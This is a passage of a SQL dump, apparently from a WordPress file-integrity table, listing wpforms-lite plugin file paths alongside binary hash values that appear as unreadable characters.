F8-cV','',0,'?'),(',ןº3','wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/analytics.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cC?y;\"cG','H8v^D{>73q̜','',0,'?'),('O\r=<^','wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/smtp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pܥ\rf8\rd','=Ⱥ8qFFd4pV0R','',0,'?'),('ˋ{bR4','wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/smtp.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߶:++w$F','C*GFۥPx\07cHgaOb','',0,'?'),('};93ne}s>:%','wp-content/plugins/wpforms-lite/assets/js/flatpickr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<W2l0՚:On','\"QP/T0NQw)4upY','',0,'?'),('#qJ\rAv','wp-content/plugins/wpforms-lite/assets/js/integrations/wpforms-elementor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HTW¢','n\ZRFڐh	h~.Sl\'~~A','',0,'?'),('RZ\":rw','wp-content/plugins/wpforms-lite/assets/js/integrations/wpforms-elementor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j1I\Zg','nAޣ\Z[D%Djd[톣*','',0,'?'),('.mYZ0<+','wp-content/plugins/wpforms-lite/assets/js/jquery.conditionals.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']pp ,Nt^RAa','ܷ ]I\\ yw	0\Z2`$','',0,'?'),('l*dM1p','wp-content/plugins/wpforms-lite/assets/js/jquery.inputmask.bundle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hSd\"Wc','^>J{܎;K\'.Y4','',0,'?'),('7YҶB<I','wp-content/plugins/wpforms-lite/assets/js/jquery.insert-at-caret.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')B{3','00s<RZ	iB-7Z@̆','',0,'?'),('~FkC[e','wp-content/plugins/wpforms-lite/assets/js/jquery.jquery-confirm.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|;=!2g','(p]$Ec;w#\0}x','',0,'?'),(',\"t>t?.<OM','wp-content/plugins/wpforms-lite/assets/js/jquery.matchHeight-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mfϫv&K3j','eܡ >\0w\\Gs_XT0','',0,'?'),('9FB|msozg','wp-content/plugins/wpforms-lite/assets/js/jquery.minicolors.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ko\Z:O-Q','Aƾ|n8\\k%J[!','',0,'?'),('CMR^#U','wp-content/plugins/wpforms-lite/assets/js/jquery.payment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p5a)yk','=!UN^^G\n1+t','',0,'?'),('b?WBD!?l','wp-content/plugins/wpforms-lite/assets/js/jquery.serialize-object.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<rJz o*(\0[','T\"ۼ`B8a@cw)$p','',0,'?'),('uKmqƐn','wp-content/plugins/wpforms-lite/assets/js/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yb3C꣓}\'R','#`ȮFh\'Fw1s+2X','',0,'?'),('@-Q\rU֮','wp-content/plugins/wpforms-lite/assets/js/jquery.tooltipster.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\0@@J','Wͫ=j>m	\r늖S<B:','',0,'?'),('/9l{[','wp-content/plugins/wpforms-lite/assets/js/jquery.validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4T{#','H:,\0.IEA%YH@	R','',0,'?'),('{ୢߵ-\\','wp-content/plugins/wpforms-lite/assets/js/jquery.validate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#<k\"x\'','*gU<}w:j\nH~','',0,'?'),('װ~W1','wp-content/plugins/wpforms-lite/assets/js/list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j};8`)N2@B','ɒZfU>?mi@鏐\n','',0,'?'),('\n&0e$5Df','wp-content/plugins/wpforms-lite/assets/js/lity.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wz|G','M+(\\]BRLY#?w','',0,'?'),('!\\G\\@','wp-content/plugins/wpforms-lite/assets/js/mailcheck.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rn\\gdyc','31\"b\"5*뱜tlmr\0','',0,'?'),('Xuȴ|mʏ_P','wp-content/plugins/wpforms-lite/assets/js/moment-with-locales.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q~IxF','tc@bl(1\n}o','',0,'?'),('nMFq\nE[ӥ','wp-content/plugins/wpforms-lite/assets/js/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~`wZƼ)h','%}-)~MwT=gH!','',0,'?'),('͚5!HD#H','wp-content/plugins/wpforms-lite/assets/js/purify.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rd\",SqGe','FC֚/yK֣WxﰡdKɮ$6g	','',0,'?'),('w_U|=ުU','wp-content/plugins/wpforms-lite/assets/js/text-limit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':0s)r$','4<	RR_eQ,F','',0,'?'),('Hn Oi1iu','wp-content/plugins/wpforms-lite/assets/js/text-limit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RvW9ѹ*W','ye6kM`@R\0ZW^/(','',0,'?'),('z橤TαD!','wp-content/plugins/wpforms-lite/assets/js/wpforms-confirmation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NeKAeAN','ٱ>9 3]MF*5Ae','',0,'?'),('	q3E1','wp-content/plugins/wpforms-lite/assets/js/wpforms.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3խCZ','VC=D<{~1O','',0,'?'),('ج}ȑ#׽e','wp-content/plugins/wpforms-lite/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qx狭30km:]','M\r{L59}X%_Օ%f.>H','',0,'?'),('#XEMLY\"s3','wp-content/plugins/wpforms-lite/includes/admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mE37dp','/N])LWOYL+ΏJq','',0,'?'),('fG-,\"k','wp-content/plugins/wpforms-lite/includes/admin/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qUiu:=}','L{!OՑdkX[Waex','',0,'?'),('2vds-ܳȈ+','wp-content/plugins/wpforms-lite/includes/admin/builder/class-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&7VV;','mlQx72x;G3=3YG\raE','',0,'?'),('<\nygћ__','wp-content/plugins/wpforms-lite/includes/admin/builder/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v{x$`bM7#','׷cwuN?Ovn\n.=','',0,'?'),('PLqIX?','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+-Kz|Nxyi','eȭe\r2ř\"CA	jr]=zqƎ9%','',0,'?'),('eJya˯','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QA\0*HF>','(RCL\ZNUObm5vJ>r','',0,'?'),('ܒ3BMla9S','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-payments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a2t\'5ϝTw','l!R\0\n-Sx[U\n[vņo4`5','',0,'?'),('l\"pqZ','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-providers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' [`x,G̹','cqOF+,(K	9V>yp','',0,'?'),('ëmY\"f+>#','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FˇTҏE;z','6\r\r*)&{?$Tju','',0,'?'),('ChL=-1BvdSa','wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<CVsY#','+ܮz@Ga:O\Z4ƒ׿','',0,'?'),(';sB!U5OT','wp-content/plugins/wpforms-lite/includes/admin/class-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z4n,&Kj',';:^⡺d^P+MMYE92','',0,'?'),('8ukKV','wp-content/plugins/wpforms-lite/includes/admin/class-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rO&Lg%','TXnxx^T$PKUۏf/y','',0,'?'),('\ng','wp-content/plugins/wpforms-lite/includes/admin/class-importers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zJ̮tYZ0','ϼ1Cs֔##*`\\Aq	','',0,'?'),('h%\0C','wp-content/plugins/wpforms-lite/includes/admin/class-install-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':A)\nXFu','9&6B{y\r6pMۍep.','',0,'?'),('1k1seǢҠy','wp-content/plugins/wpforms-lite/includes/admin/class-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O@,s%5:','(s,\\:TOՄeVJ','',0,'?'),('a+/Z&$\r5','wp-content/plugins/wpforms-lite/includes/admin/class-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rԛ>%~|','HJ`g7A Qg=LݫM*','',0,'?'),('\Zx$oָ','wp-content/plugins/wpforms-lite/includes/admin/class-review.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QqArH5^Q!O',':$VpJDwIaRa!j@֭nr','',0,'?'),('p+|i%ޠ|','wp-content/plugins/wpforms-lite/includes/admin/class-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@Ѳ]^_y]v#3r','8>_r?s RzoQ,L\nxLX80','',0,'?'),('8ˏc\rT9x\0','wp-content/plugins/wpforms-lite/includes/admin/class-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w@@Q.)KXJ7','Sr+Sy$5#[LL:}0(ݟ','',0,'?'),('4hFdҴO','wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zul!\"','\nM~͇oꦍo#InG].	U`\'B','',0,'?'),('\')X$-oh{','wp-content/plugins/wpforms-lite/includes/admin/importers/class-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ES#3OPt|','$nA(.u,9HT̃kva\r$j$','',0,'?'),('Z+.$zWG_','wp-content/plugins/wpforms-lite/includes/admin/importers/class-contact-form-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N@jf<^c:','n:4=e#U:e6q}#&','',0,'?'),('$ywuc!WZ','wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ɉ#kf-A','XpU@]{*O7zpwD','',0,'?'),('k|./(p','wp-content/plugins/wpforms-lite/includes/admin/importers/class-pirate-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s0c!3\\k','xV!A濘,Y{J1','',0,'?'),('#9f@6b;','wp-content/plugins/wpforms-lite/includes/admin/importers/interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[_VȴN','U|ج\nYp2tu5!','',0,'?'),('uq5kjTƁMȯ','wp-content/plugins/wpforms-lite/includes/admin/overview/class-overview-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kvL','n>tUaAg5/+iŰۺ','',0,'?'),('iʶlz^H4','wp-content/plugins/wpforms-lite/includes/admin/overview/class-overview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Z@k',';QqU]0΅Ln6/9Ba4','',0,'?'),('[sךk [`','wp-content/plugins/wpforms-lite/includes/admin/settings-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u*2Q\\jխ','!514ɓL{vVK','',0,'?'),('S9&|g2?&','wp-content/plugins/wpforms-lite/includes/class-conditional-logic-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','līϿT','-{\Z?%>=YdӒ%NOս','',0,'?'),('FvzE!J','wp-content/plugins/wpforms-lite/includes/class-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ͱMc >~<','BRL8T1rGZ*','',0,'?'),('ҕ1VD3C+a','wp-content/plugins/wpforms-lite/includes/class-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dlQÒ\',8\'','gCޟFiHr\n]v@V>{_','',0,'?'),('Ym[pI./','wp-content/plugins/wpforms-lite/includes/class-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0sh\'\0','[h<vM@\0;RGk','',0,'?'),('\ZI\"Q	}vgQ\\','wp-content/plugins/wpforms-lite/includes/class-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Erxa?u*','}^8OOwŊڃKE龍Sv','',0,'?'),('L8Șd.q#','wp-content/plugins/wpforms-lite/includes/class-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\VќL*','i7<;Hɹ[_B;9#nI','',0,'?'),('@m-','wp-content/plugins/wpforms-lite/includes/class-logging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~4jXo]','tq2*픦ܸ\nV5YflG8','',0,'?'),('}\nohBm\rW5','wp-content/plugins/wpforms-lite/includes/class-process.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o,P#_~RRY','emm@G>U5R.z:','',0,'?'),('kN0ĳE5','wp-content/plugins/wpforms-lite/includes/class-providers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nŤtj','`ÒBet+qZԱܳʲx','',0,'?'),(',ᳺo3	G>','wp-content/plugins/wpforms-lite/includes/class-smart-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','΀\Z*A','NFj*Y,O<=碌Br@','',0,'?'),('&j,.7_Ѳ','wp-content/plugins/wpforms-lite/includes/class-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%,\'\0m˵kr&','$t>t7[n+c+Āt@:OE','',0,'?'),('WmT>\\-x/n','wp-content/plugins/wpforms-lite/includes/class-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z-~fm','ʮ1TJ\Z G\r\'m>[V=','',0,'?'),('dc*VEx\Zd^','wp-content/plugins/wpforms-lite/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@xFEIG\"','cn,ROۮ!UD?i[A3','',0,'?'),('<EL~_/s','wp-content/plugins/wpforms-lite/includes/emails/class-emails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': ۭZ`','S$:RI}EwTQ.e-','',0,'?'),('ֈKTVw~$','wp-content/plugins/wpforms-lite/includes/emails/templates/body-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zGAϺ|u/\ZEG',')\ZwO|НӡI\"X̗~\Z49Z','',0,'?'),(')žo;0YhA','wp-content/plugins/wpforms-lite/includes/emails/templates/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vN?\ry','*EbPzXHO\n>}~xmбg','',0,'?'),('jKћ.P%','wp-content/plugins/wpforms-lite/includes/emails/templates/field-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ALBÞK>','+V֮je&̏[*$','',0,'?'),('\0T\r~m)7Kǡ','wp-content/plugins/wpforms-lite/includes/emails/templates/footer-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j*E\\',';<f}:{E]萭oPvsH','',0,'?'),('436o%','wp-content/plugins/wpforms-lite/includes/emails/templates/header-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4\\r0iE','KoHnyXd<ͫU:63<{0W_K','',0,'?'),('8^\"sC','wp-content/plugins/wpforms-lite/includes/fields/class-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ߞ͵JxA8','X/;T*D\\rPzU6̿AJ','',0,'?'),('1z<}H:ӫZx','wp-content/plugins/wpforms-lite/includes/fields/class-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','91T8G\rO','.Rm2[n!%j%ì7Lpw','',0,'?'),('U=Cm;:\\gIC','wp-content/plugins/wpforms-lite/includes/fields/class-email.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\n3\0OA̮','U:^-,[;>qƈJs*sM','',0,'?'),('+Я(t','wp-content/plugins/wpforms-lite/includes/fields/class-gdpr-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A](*\0W','W=#6Z\ZO~nv.AvTni7k','',0,'?'),('#!YnaZag','wp-content/plugins/wpforms-lite/includes/fields/class-name.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D&kxN	','>-JX&rħdU!GKAl|Pg','',0,'?'),('<Ӡp-.*j','wp-content/plugins/wpforms-lite/includes/fields/class-number-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʁdp1','곹~mO^w5Y@dr:@Y	','',0,'?'),('B/ȅ	zU5Y','wp-content/plugins/wpforms-lite/includes/fields/class-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';SYO@2\0','*̿w}]LJ5E+','',0,'?'),('wr\"^,','wp-content/plugins/wpforms-lite/includes/fields/class-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G)Krq','\r$[\n޵ݛTuKg\rP','',0,'?'),('6,U\\0','wp-content/plugins/wpforms-lite/includes/fields/class-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d۽ngyjK','CT\\[wMZSh>	','',0,'?'),('),=]k=','wp-content/plugins/wpforms-lite/includes/fields/class-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7y\rDѧP08+','zGuq\rwEߺFR 9+hhC','',0,'?'),('\Z Q]i','wp-content/plugins/wpforms-lite/includes/fields/class-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',%9?GN*','\0W(LQҌf`Bm','',0,'?'),('B\'մ?]','wp-content/plugins/wpforms-lite/includes/functions-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\rF7掺\"L','D\'}dQ-{_}21','',0,'?'),(';Mg8~','wp-content/plugins/wpforms-lite/includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\0\\dbJ҂','.u{HjqJtiB$yۢ{','',0,'?'),('|EOm(5','wp-content/plugins/wpforms-lite/includes/integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aMG7[','\n.*sx>o\'Ky`M0@wJ0J','',0,'?'),('*,A*>','wp-content/plugins/wpforms-lite/includes/providers/class-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cBr','|<sQYx\ZxZՔͨFe','',0,'?'),('\n}HXLK','wp-content/plugins/wpforms-lite/includes/providers/class-constant-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','daʦ_+R:','J:2:W\01R,%MMYML,d','',0,'?'),('a/1 ͥI;','wp-content/plugins/wpforms-lite/includes/templates/class-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"o$vmH\\%d','RKһF;%)LJ4׭?L҈T','',0,'?'),('5&衜Ж0\Z','wp-content/plugins/wpforms-lite/includes/templates/class-blank.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QCO-[^a3','S[z+QtȪxl(BF','',0,'?'),('|3~','wp-content/plugins/wpforms-lite/includes/templates/class-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sJ6O \Zn','&!dJ8>NS;d<H','',0,'?'),('% \'1Q','wp-content/plugins/wpforms-lite/includes/templates/class-subscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$\'YeJo','\r\rys*|rL:97u|j','',0,'?'),('y̒ό!߫	4','wp-content/plugins/wpforms-lite/includes/templates/class-suggestion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	lvq5S8HMY','}`RCM[ ȰIlBex','',0,'?'),('+)rj).','wp-content/plugins/wpforms-lite/languages/wpforms-lite.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C+.2B띢s','++F$*Wn]0֭ٚs\r','',0,'?'),('o.uJ;{{\"','wp-content/plugins/wpforms-lite/lite/assets/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lh&5޹','3(x;&Ps$W};%7','',0,'?'),('$K1W,2`+','wp-content/plugins/wpforms-lite/lite/assets/css/admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kl\n%-&T','H]gen%̱:pKտ%','',0,'?'),('>qx3	','wp-content/plugins/wpforms-lite/lite/assets/js/admin/builder-education.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\rwC+ZRI161k','\"`_[餟7 ','',0,'?'),(')Qrey','wp-content/plugins/wpforms-lite/lite/assets/js/admin/builder-education.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';KC)̃dٮ','GPeB\n\"f?1@?ԧm','',0,'?'),('L>,JxW;u','wp-content/plugins/wpforms-lite/lite/assets/js/admin/connect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rI|`N]b(','Y-(Sِ_,(\n\0EQvD*,','',0,'?'),('8y?Nsha','wp-content/plugins/wpforms-lite/lite/assets/js/admin/connect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D>>HLduB','&)\\fe/vP{/ސmp','',0,'?'),(',a9~R','wp-content/plugins/wpforms-lite/lite/assets/js/admin/dashboard-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϷwY14C(ч','q4L@c`_]}5ۄԉh-/ơdk','',0,'?'),('Tާu̓','wp-content/plugins/wpforms-lite/lite/assets/js/admin/dashboard-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7׆j','\r;ש?`ݐz$G','',0,'?'),('8%eh1E[F\Z','wp-content/plugins/wpforms-lite/lite/assets/js/admin/education.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-x##4','A\Z톍ˤ\Z4(A=w]-l','',0,'?'),('H8ᑳ\nrb','wp-content/plugins/wpforms-lite/lite/assets/js/admin/education.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r2iv\nQrq','?1<^l\\\Z[0/B~+XV$Ĉ	','',0,'?'),('PV2','wp-content/plugins/wpforms-lite/lite/assets/js/admin/settings-education.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T;jS.\Z','xz\'ra&Qf`\n=^m1axΦN','',0,'?'),('cXhO,','wp-content/plugins/wpforms-lite/lite/assets/js/admin/settings-education.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r2\"2Ņo','Lb$̶jF(:,y*}','',0,'?'),('*H)t','wp-content/plugins/wpforms-lite/lite/assets/js/admin-builder-lite.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4翬tp7','%ܯ\nMʛ\\G5&<?8>PKI','',0,'?'),('Ar=Jl]','wp-content/plugins/wpforms-lite/lite/assets/scss/admin/_education.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r{,8o*','36:!vZvɅʎǤp.','',0,'?'),('a27Yÿ_L','wp-content/plugins/wpforms-lite/lite/assets/scss/admin/_page-settings-access.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L.zg\Z7H','en*}v9zb㮓Q8@W}','',0,'?'),('p7sr 尒','wp-content/plugins/wpforms-lite/lite/assets/scss/admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y;ٔj:o','jNH^w̸6 k ㍷','',0,'?'),('-Gӈ_t','wp-content/plugins/wpforms-lite/lite/wpforms-lite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0<[z&n!̬O=','mY<jcDRS,RpBZ]m3tII\"','',0,'?'),('~㤿<n-ģ','wp-content/plugins/wpforms-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AѰ읧t','-/myB@f٣~LV+P&Km','',0,'?'),('\Z~32j31','wp-content/plugins/wpforms-lite/src/Access/Capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')#2+K3l','\'c/`VDH$O)+fqATa7','',0,'?'),('\nᏍ5 &>@','wp-content/plugins/wpforms-lite/src/Admin/AdminBarMenu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eޕɞ܆`k','xh&CT*&Pw+~','',0,'?'),('Rl,l%%.','wp-content/plugins/wpforms-lite/src/Admin/Challenge.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZHΞcЖi@\"{','v9D2I&0mTf?vaA','',0,'?'),('L\rv?a-Jɘ\Z','wp-content/plugins/wpforms-lite/src/Admin/FlyoutMenu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oqf1F','ol8]fBzLOhş&ʓ','',0,'?'),('I}oiM%c\'','wp-content/plugins/wpforms-lite/src/Admin/Loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#):<R\0\'',',{I-}52w:BL{ ','',0,'?'),(';FيR	\n','wp-content/plugins/wpforms-lite/src/Admin/Notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M1j$a4:C','82HH?Ѩϓr68gKc','',0,'?'),('ȴ6-Z\\>;*','wp-content/plugins/wpforms-lite/src/Admin/Pages/Analytics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')xfNݏ`O','6ӊd[JAR!H<ĨwE\0`','',0,'?'),('Q\\O9bV_@','wp-content/plugins/wpforms-lite/src/Admin/Pages/Community.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9N/(.\'f','U\r[.x~	N\0h	MU','',0,'?'),('CWi8|l.','wp-content/plugins/wpforms-lite/src/Admin/Pages/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i_5#=','ͳ=>?\Z俑ԦAW!mhBs9','',0,'?'),('ZEK-','wp-content/plugins/wpforms-lite/src/Emails/InfoBlocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%2Oz','vhD»$ϐw|;khʡ','',0,'?'),('dC	I%_zF','wp-content/plugins/wpforms-lite/src/Emails/Mailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٌuʇ^k(yH\0','}|5\\>:<\0j9\0','',0,'?'),('w\09SW~','wp-content/plugins/wpforms-lite/src/Emails/Styler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MF7klG','43̣\0SCB<pxvMa?','',0,'?'),('rLY9	&#:l','wp-content/plugins/wpforms-lite/src/Emails/Summaries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͐wmBHGж','v\nZcBR{E|*$>b','',0,'?'),('72gs_ụ$','wp-content/plugins/wpforms-lite/src/Emails/Templates/General.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jalBq+j','AFYk{\'l[֖px`zp\\=t','',0,'?'),('!-^>:MSpG','wp-content/plugins/wpforms-lite/src/Emails/Templates/Summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F磪sbJh*',']e\07%Ys{Z\\TNG','',0,'?'),('ԭdV0eb\Z','wp-content/plugins/wpforms-lite/src/Forms/Loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uMC7Niԩh','ȊĂ{yل%S2','',0,'?'),('2Am?*=','wp-content/plugins/wpforms-lite/src/Forms/Preview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܁ji$I',')Ujj^/	